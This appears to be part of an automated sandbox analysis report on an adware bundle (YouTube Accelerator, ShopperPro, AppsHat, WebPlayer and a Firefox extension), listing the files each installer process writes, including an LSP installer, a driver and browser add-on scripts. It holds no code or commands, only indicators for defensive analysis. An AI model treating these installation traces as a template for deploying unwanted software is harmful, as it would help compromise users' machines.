C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAPTB.LNG (401 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0002.TMP (2104 bytes)
%Program Files% (x86)\YouTube Accelerator\temp.000 (51331 bytes)
%Program Files% (x86)\YouTube Accelerator\res\~GLH0014.TMP (75 bytes)
%Program Files% (x86)\YouTube Accelerator\YouTubeAcceleratorService.exe (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VASRB.LNG (1184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst2.exe (30222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAPOL.LNG (1166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VASRB.LNG (1184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAESM.LNG (873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytalsp.dll (3271 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFRA.LNG (402 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAccelerator.exe (35420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFRA.LNG (402 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ipc.dll (6691 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH000f.TMP (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VANLD.LNG (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0007.TMP (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLG6A6A.tmp (93076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFIL.LNG (351 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst.exe (20746 bytes)
%Program Files% (x86)\YouTube Accelerator\unelevate.exe (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\engine.dll (34861 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\Res.dll (7687 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH000a.TMP (18940 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHUninstall.exe (3528 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAcceleratorService.exe (20848 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAITA.LNG (1660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAJPN.LNG (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0005.TMP (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VADEU.LNG (18 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0012.TMP (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\helper.dll (4155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\varemove_page2.mht (1961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAESM.LNG (873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAIDN.LNG (17 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0015.TMP (4061 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0000.TMP (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\AniGIF.ocx (3175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\varemove_page1.mht (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\Cancel.gif (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAJPN.LNG (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VANLD.LNG (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\unelevate.exe (2082 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cabex.dll (98 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YouTube Accelerator\YouTube Accelerator.lnk (1 bytes)
%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VATRK.LNG (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFAR.LNG (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLM6663.tmp (12 bytes)
C:\Windows\SysWOW64\temp.000 (3624 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH000b.TMP (11493 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YouTube Accelerator\~GLH0021.TMP (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAROM.LNG (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFIL.LNG (351 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\comtest.gif (1817 bytes)
%Program Files% (x86)\YouTube Accelerator\INSTALL.LOG (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAENG.LNG (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFAR.LNG (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAPTB.LNG (401 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\progbar.gif (238 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0020.TMP (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytauninstall.exe (10592 bytes)

The process regsvr32.exe:3240 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\YTAHelper\YTAHelper.dll (409 bytes)

The process regsvr32.exe:3888 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\ShopperPro\ShopperPro.dll (442 bytes)

The process regsvr32.exe:1808 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\YTAHelper\YTAHelper64.dll (491 bytes)

The process regsvr32.exe:3964 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\ShopperPro\ShopperPro64.dll (528 bytes)

The process lspinst.exe:3356 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\YouTube Accelerator\instlsp.log (253 bytes)
C:\ProgramData\TEMP:56E2E879 (417 bytes)

The process lspinst.exe:4156 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\YouTube Accelerator\instlsp.log (295 bytes)
C:\ProgramData\TEMP:56E2E879 (417 bytes)

The process webplayer_installer.exe:2708 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso928F.tmp\nsExec.dll (14 bytes)

The process YTAHEL~1.EXE:1600 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\YTAHelper\FireFox\content\YTAHelper_64.png (4 bytes)
%Program Files% (x86)\YTAHelper\FireFox\chrome.manifest (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\System.dll (23 bytes)
%Program Files% (x86)\YTAHelper\YTAHelper.exe (32784 bytes)
%Program Files% (x86)\YTAHelper\FireFox\install.rdf (884 bytes)
%Program Files% (x86)\YTAHelper\JSDriver\jsdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\jsdrv.exe (100669 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll (11667 bytes)
%Program Files% (x86)\YTAHelper\FireFox\content\overlay.xul (203 bytes)
%Program Files% (x86)\YTAHelper\JSDriver\jsdrv.exe (100378 bytes)
C:\Users\Public\Documents\YTAHelper\JsDriver\Config.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsProcess.dll (12 bytes)
%Program Files% (x86)\YTAHelper\yta_database1_0_0.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9405.tmp (118586 bytes)
%Program Files% (x86)\YTAHelper\FireFox\content\overlay.js (13 bytes)
%Program Files% (x86)\YTAHelper\YTAHelper.dll (13584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\MoreInfo.dll (15 bytes)
%Program Files% (x86)\YTAHelper\YTAHelper64.dll (16424 bytes)
%Program Files% (x86)\YTAHelper\FireFox\content\shopperpro_128.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsExec.dll (14 bytes)

The process appshat_generic.exe:3896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\appshat.exe (796935 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA7.tmp (10027 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\webplayer_installer.exe (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\setup[1].exe (747439 bytes)

The process DCytaiesmt_smtyc_setup.exe:1064 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_sense.exe (51775 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_yta.exe (26262 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_1064_DCytaiesmt_smtyc_setup.log (14455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_shopperpro.exe (23129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_iwebar.exe (42875 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_28897\DCytaiesmt_smtyc_setup.exe (7726 bytes)

The process DCytaiesmt_smtyc_setup.exe:392 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_23184\DCytaiesmt_smtyc_setup.exe (7726 bytes)

The process cscript.exe:1372 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\shortcut.ico (6242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\main.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\64x64[1].ico (4955 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\16x16[1].ico (1150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\tray.ico (1 bytes)

The process spbiu.exe:3496 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\ShopperPro\spbihe.js (435 bytes)

The process spbiu.exe:960 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\ShopperPro\spbihe.js (435 bytes)
%Program Files%\Common Files\ShopperPro\spbia.exe (327 bytes)

The process INS_SENSE.EXE:3844 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\Hbiagmhjfvp.exe (1596567 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\Ogbxs.tmp (360698 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\aexyni.dll (2141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\rblyvufer.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\wwrumuo.dll (30 bytes)

The process 19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe:4452 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\0a2d548fab0bdcbb01b05c6e87825d0b.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\2966208f6f17965b7ecec8246f3a7987.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ec896a0e141e5dc276507e634c372cef.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\082018fb846ff65c5bf5617a33ee152f.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1bd6d602d9bbac27ba391259e7bbbbe3.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\337.js (413 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b89f20f5ff37e721bdf8c6b27adf34f0.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\957753003961e16b9d3875160c1d836c.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5cfbf1d23e9c70a6610d2ba856d760c7.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\0d9afa14293fb2defd433c1e44084072.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a9bca21d8ed5604f189d3c6b5d14f212.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\922de081cce9760fc2ef469ee33b47be.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\01e3df8ee766955c1fe4bc2d7351c1e9.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\908911f377da2f4300ad53c584a6f1c7.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (949 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1839b379e07746aeb5de0bc97f3bdce5.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\f99e7a2531569faa80c16ca9d5e1c633.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d3fdac9512d9c4e9a34744eeaf34ed34.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\26e4035a00b96086b392f3408b392c18.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\e646b7626b362452244ed88243e574d7.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\5e801953aaeac606dabc295bd143d82c.js (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\360b0315ed71c76681103028529549ca.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a0b72c25dfa79d2809d9cdd1bc7a2edc.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5f13d1eeafa4224378a0236393d8c64c.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ad5771041c3b23e83ee8ec04bfaf6c66.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\193.js (873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a798b64d3aefd50a53b1c66534d2d1cd.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\6c635353444d33ccb21cdd3803eb0ce6.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1dba13f84a1d100b00721ddfc719ab9b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7dd27344207a3d5b338efe5da772d56e.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\192.js (873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
